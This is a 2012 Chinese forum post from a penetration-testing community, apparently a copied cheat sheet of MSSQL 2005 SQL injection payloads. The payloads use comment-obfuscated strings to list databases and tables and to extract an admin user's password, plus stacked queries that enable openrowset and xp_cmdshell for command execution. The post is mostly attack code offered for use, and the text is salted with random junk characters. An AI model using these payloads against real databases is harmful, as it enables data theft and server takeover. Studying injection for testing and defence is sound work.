中国网络渗透测试联盟

标题: MSsql2005注入语句 [打印本页]

作者: admin    时间: 2012-9-13 17:19
标题: MSsql2005注入语句

  E9 m# l6 H6 E
& h0 r. T) A& U% {. @* R
3 M5 I, k3 W- |7 A8 A  k2 n[Copy to clipboard]CODE:, E% y' H3 ]0 C0 N
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
' t$ U  X9 Y) p8 Y- R6 u: e+ p, l  f( Y  k
爆表语句,somedb部份是所要列的数据库,红色数字1累加( ~4 X7 W6 ?( Y8 J

8 c) \( J8 T  M4 v8 a- w* n! p3 \% U& V
[Copy to clipboard]CODE:
; Y4 N9 s4 }7 t4 s$ L/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
! E* q, }% J/ Q/ E5 Z7 D9 a0 A1 l" z6 ~
爆字段语句,爆表admin里user='icerover'的密码段; L: |# A& `- L' k% y: V
% h5 [: U  i' A- p
1 ]. [" d% W+ M2 `& r- j
[Copy to clipboard]CODE:
( [" \  S$ `, d/ K1 E* M; e**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
) R; U9 b- r* r% h& v% v, F. w! w& ?$ v* Y8 l- z
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
3 X* b  A' E" G; @如果是sa权限,可以这样来开启
9 G% P, Y, y3 G0 f# {9 b+ q* L开启openrowset. }2 ^4 }2 G; N8 S
; N  i" f- T& \

& }; T+ p8 P3 n. @7 u4 h, S+ C# \[Copy to clipboard]CODE:4 R9 b, V. [. B6 [# G! i4 g/ D4 H
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--# k: |+ [( Y& _8 [, G0 A
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
5 F( `1 }/ }2 A: V: q4 b9 r4 A/ p2 e' g4 u$ v6 _" o4 Y; w! {
开启xp_cmdshell' A8 C7 m1 J" _+ o1 U9 m
- K4 a; {4 }9 Z3 `8 z- N  g5 c
5 p& X4 W0 a1 C2 n
[Copy to clipboard]CODE:- ^1 E4 U! a  R2 S' z
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--5 l4 h3 G1 T* e$ T$ `1 q6 r
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
( `, P/ o" U& r
3 @. W7 x  W$ s# l: Y6 \3 ?, Z2 v" Fok,over~~晚安
8 l% W  _" W+ i- P$ B, c; y




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2